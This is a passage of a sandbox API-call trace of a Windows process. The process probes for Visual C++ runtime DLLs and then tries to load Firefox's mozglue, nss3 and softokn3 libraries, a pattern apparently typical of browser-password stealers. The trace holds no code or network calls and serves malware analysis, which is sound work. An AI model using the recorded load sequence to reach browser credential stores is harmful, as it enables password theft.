returned 2 [0204.791] lstrlenW (lpString="\\msvcr") returned 6 [0204.791] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.791] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.792] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.792] lstrcatW (in: lpString1="\\msvcr", lpString2="90" | out: lpString1="\\msvcr90") returned="\\msvcr90" [0204.792] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.792] lstrlenW (lpString=".dll") returned 4 [0204.793] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.793] lstrlenW (lpString=".dll") returned 4 [0204.793] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.793] lstrlenW (lpString=".dll") returned 4 [0204.793] lstrlenW (lpString="\\msvcr90") returned 8 [0204.793] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.793] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.793] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.794] lstrcatW (in: lpString1="\\msvcr90", lpString2=".dll" | out: lpString1="\\msvcr90.dll") returned="\\msvcr90.dll" [0204.794] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.794] PathFileExistsW (pszPath="\\msvcr90.dll") returned 0 [0204.794] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.795] lstrlenW (lpString="\\msvcr") returned 6 [0204.795] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.795] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.795] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="100") returned 3 [0204.795] lstrlenW (lpString="100") returned 3 [0204.795] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.796] lstrlenW (lpString="100") returned 3 [0204.796] lstrcpyW (in: lpString1=0x2e20000, lpString2="100" | out: lpString1="100") returned="100" [0204.796] lstrlenW (lpString="100") returned 3 [0204.796] lstrlenW (lpString="\\msvcr") returned 6 [0204.796] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.796] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.796] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.796] lstrcatW (in: lpString1="\\msvcr", lpString2="100" | out: lpString1="\\msvcr100") returned="\\msvcr100" [0204.796] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.797] lstrlenW (lpString=".dll") returned 4 [0204.797] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.797] lstrlenW (lpString=".dll") returned 4 [0204.797] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.797] lstrlenW (lpString=".dll") returned 4 [0204.797] lstrlenW (lpString="\\msvcr100") returned 9 [0204.797] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.798] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.798] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.798] lstrcatW (in: lpString1="\\msvcr100", lpString2=".dll" | out: lpString1="\\msvcr100.dll") returned="\\msvcr100.dll" [0204.798] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.799] PathFileExistsW (pszPath="\\msvcr100.dll") returned 0 [0204.799] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.799] lstrlenW (lpString="\\msvcr") returned 6 [0204.799] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.799] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.800] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="110") returned 3 [0204.800] lstrlenW (lpString="110") returned 3 [0204.800] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.800] lstrlenW (lpString="110") returned 3 [0204.800] lstrcpyW (in: lpString1=0x2e20000, lpString2="110" | out: lpString1="110") returned="110" [0204.800] lstrlenW (lpString="110") returned 3 [0204.800] lstrlenW (lpString="\\msvcr") returned 6 [0204.800] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.800] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.801] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.801] lstrcatW (in: lpString1="\\msvcr", lpString2="110" | out: lpString1="\\msvcr110") returned="\\msvcr110" [0204.801] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.801] lstrlenW (lpString=".dll") returned 4 [0204.801] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.802] lstrlenW (lpString=".dll") returned 4 [0204.802] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.802] lstrlenW (lpString=".dll") returned 4 [0204.802] lstrlenW (lpString="\\msvcr110") returned 9 [0204.802] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.802] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.802] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.803] lstrcatW (in: lpString1="\\msvcr110", lpString2=".dll" | out: lpString1="\\msvcr110.dll") returned="\\msvcr110.dll" [0204.803] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.803] PathFileExistsW (pszPath="\\msvcr110.dll") returned 0 [0204.803] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.803] lstrlenW (lpString="\\msvcr") returned 6 [0204.803] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.804] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.804] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="120") returned 3 [0204.804] lstrlenW (lpString="120") returned 3 [0204.804] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.804] lstrlenW (lpString="120") returned 3 [0204.804] lstrcpyW (in: lpString1=0x2e20000, lpString2="120" | out: lpString1="120") returned="120" [0204.804] lstrlenW (lpString="120") returned 3 [0204.804] lstrlenW (lpString="\\msvcr") returned 6 [0204.804] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.804] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.805] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.805] lstrcatW (in: lpString1="\\msvcr", lpString2="120" | out: lpString1="\\msvcr120") returned="\\msvcr120" [0204.805] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.806] lstrlenW (lpString=".dll") returned 4 [0204.806] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.806] lstrlenW (lpString=".dll") returned 4 [0204.806] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.806] lstrlenW (lpString=".dll") returned 4 [0204.806] lstrlenW (lpString="\\msvcr120") returned 9 [0204.806] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.806] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.807] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.807] lstrcatW (in: lpString1="\\msvcr120", lpString2=".dll" | out: lpString1="\\msvcr120.dll") returned="\\msvcr120.dll" [0204.807] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.807] PathFileExistsW (pszPath="\\msvcr120.dll") returned 0 [0204.808] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.808] lstrlenW (lpString="\\msvcr") returned 6 [0204.808] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.808] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.808] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="130") returned 3 [0204.808] lstrlenW (lpString="130") returned 3 [0204.808] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.809] lstrlenW (lpString="130") returned 3 [0204.809] lstrcpyW (in: lpString1=0x2e20000, lpString2="130" | out: lpString1="130") returned="130" [0204.809] lstrlenW (lpString="130") returned 3 [0204.809] lstrlenW (lpString="\\msvcr") returned 6 [0204.809] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.809] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.809] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.810] lstrcatW (in: lpString1="\\msvcr", lpString2="130" | out: lpString1="\\msvcr130") returned="\\msvcr130" [0204.810] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.810] lstrlenW (lpString=".dll") returned 4 [0204.810] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.810] lstrlenW (lpString=".dll") returned 4 [0204.810] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.810] lstrlenW (lpString=".dll") returned 4 [0204.810] lstrlenW (lpString="\\msvcr130") returned 9 [0204.810] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.811] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.811] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.811] lstrcatW (in: lpString1="\\msvcr130", lpString2=".dll" | out: lpString1="\\msvcr130.dll") returned="\\msvcr130.dll" [0204.811] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.812] PathFileExistsW (pszPath="\\msvcr130.dll") returned 0 [0204.812] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.812] lstrlenW (lpString="\\msvcr") returned 6 [0204.812] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.812] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.813] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="140") returned 3 [0204.813] lstrlenW (lpString="140") returned 3 [0204.813] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.813] lstrlenW (lpString="140") returned 3 [0204.813] lstrcpyW (in: lpString1=0x2e20000, lpString2="140" | out: lpString1="140") returned="140" [0204.813] lstrlenW (lpString="140") returned 3 [0204.813] lstrlenW (lpString="\\msvcr") returned 6 [0204.813] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.813] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.814] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.814] lstrcatW (in: lpString1="\\msvcr", lpString2="140" | out: lpString1="\\msvcr140") returned="\\msvcr140" [0204.814] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.814] lstrlenW (lpString=".dll") returned 4 [0204.814] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.815] lstrlenW (lpString=".dll") returned 4 [0204.815] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.815] lstrlenW (lpString=".dll") returned 4 [0204.815] lstrlenW (lpString="\\msvcr140") returned 9 [0204.815] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.815] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.815] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.816] lstrcatW (in: lpString1="\\msvcr140", lpString2=".dll" | out: lpString1="\\msvcr140.dll") returned="\\msvcr140.dll" [0204.816] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.816] PathFileExistsW (pszPath="\\msvcr140.dll") returned 0 [0204.816] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.816] LoadLibraryW (lpLibFileName="\\msvcr120.dll") returned 0x0 [0204.817] LoadLibraryW (lpLibFileName="\\msvcp120.dll") returned 0x0 [0204.817] LoadLibraryW (lpLibFileName="\\mozglue.dll") returned 0x0 [0204.817] LoadLibraryW (lpLibFileName="\\nss3.dll") returned 0x0 [0204.817] LoadLibraryW (lpLibFileName="\\softokn3.dll") returned 0x0 [0204.817] VirtualFree (lpAddress=0x3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.817] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.818] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.818] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.818] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.819] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.819] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.819] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.820] lstrlenW (lpString="") returned 0 [0204.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.820] lstrcpyW (in: lpString1=0x2df0000, lpString2="" | out: lpString1="") returned="" [0204.820] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x415f388 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0204.820] SetCurrentDirectoryW (lpPathName="") returned 0 [0204.820] lstrlenW (lpString="\\") returned 1 [0204.820] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.820] lstrlenW (lpString="\\") returned 1 [0204.821] lstrcpyW (in: lpString1=0x2e20000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.821] lstrlenW (lpString="\\") returned 1 [0204.821] lstrlenW (lpString="") returned 0 [0204.821] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.821] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0204.821] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.821] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0204.821] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.822] lstrlenW (lpString="\\") returned 1 [0204.822] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.822] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.822] lstrlenW (lpString="nss3.dll") returned 8 [0204.822] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.822] lstrlenW (lpString="nss3.dll") returned 8 [0204.823] lstrcpyW (in: lpString1=0x2e20000, lpString2="nss3.dll" | out: lpString1="nss3.dll") returned="nss3.dll" [0204.823] lstrlenW (lpString="nss3.dll") returned 8 [0204.823] lstrlenW (lpString="\\") returned 1 [0204.823] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.823] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0204.823] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.823] lstrcatW (in: lpString1="\\", lpString2="nss3.dll" | out: lpString1="\\nss3.dll") returned="\\nss3.dll" [0204.823] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.824] lstrlenW (lpString="\\") returned 1 [0204.824] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.824] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.824] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.824] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.825] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.825] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcr120.dll" | out: lpString1="msvcr120.dll") returned="msvcr120.dll" [0204.825] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.825] lstrlenW (lpString="\\") returned 1 [0204.825] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.825] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0204.825] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.826] lstrcatW (in: lpString1="\\", lpString2="msvcr120.dll" | out: lpString1="\\msvcr120.dll") returned="\\msvcr120.dll" [0204.826] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.826] lstrlenW (lpString="\\") returned 1 [0204.826] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.826] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.826] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.826] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.827] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.827] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcp120.dll" | out: lpString1="msvcp120.dll") returned="msvcp120.dll" [0204.827] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.827] lstrlenW (lpString="\\") returned 1 [0204.827] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.827] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0204.827] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.828] lstrcatW (in: lpString1="\\", lpString2="msvcp120.dll" | out: lpString1="\\msvcp120.dll") returned="\\msvcp120.dll" [0204.828] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.828] lstrlenW (lpString="\\") returned 1 [0204.828] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.829] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.829] lstrlenW (lpString="mozglue.dll") returned 11 [0204.829] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.829] lstrlenW (lpString="mozglue.dll") returned 11 [0204.829] lstrcpyW (in: lpString1=0x2e20000, lpString2="mozglue.dll" | out: lpString1="mozglue.dll") returned="mozglue.dll" [0204.829] lstrlenW (lpString="mozglue.dll") returned 11 [0204.829] lstrlenW (lpString="\\") returned 1 [0204.829] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.829] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f60000 [0204.830] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.830] lstrcatW (in: lpString1="\\", lpString2="mozglue.dll" | out: lpString1="\\mozglue.dll") returned="\\mozglue.dll" [0204.830] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.830] lstrlenW (lpString="\\") returned 1 [0204.830] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.831] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.831] lstrlenW (lpString="softokn3.dll") returned 12 [0204.831] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.831] lstrlenW (lpString="softokn3.dll") returned 12 [0204.831] lstrcpyW (in: lpString1=0x2e20000, lpString2="softokn3.dll" | out: lpString1="softokn3.dll") returned="softokn3.dll" [0204.831] lstrlenW (lpString="softokn3.dll") returned 12 [0204.831] lstrlenW (lpString="\\") returned 1 [0204.831] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.831] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0204.832] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.832] lstrcatW (in: lpString1="\\", lpString2="softokn3.dll" | out: lpString1="\\softokn3.dll") returned="\\softokn3.dll" [0204.832] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.832] lstrlenW (lpString="\\") returned 1 [0204.832] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.833] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.833] lstrlenW (lpString="msvcp") returned 5 [0204.833] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.833] lstrlenW (lpString="msvcp") returned 5 [0204.833] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcp" | out: lpString1="msvcp") returned="msvcp" [0204.833] lstrlenW (lpString="msvcp") returned 5 [0204.833] lstrlenW (lpString="\\") returned 1 [0204.833] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.833] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0204.834] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.834] lstrcatW (in: lpString1="\\", lpString2="msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.834] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.834] lstrlenW (lpString="\\") returned 1 [0204.834] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.835] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.835] lstrlenW (lpString="msvcr") returned 5 [0204.835] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.835] lstrlenW (lpString="msvcr") returned 5 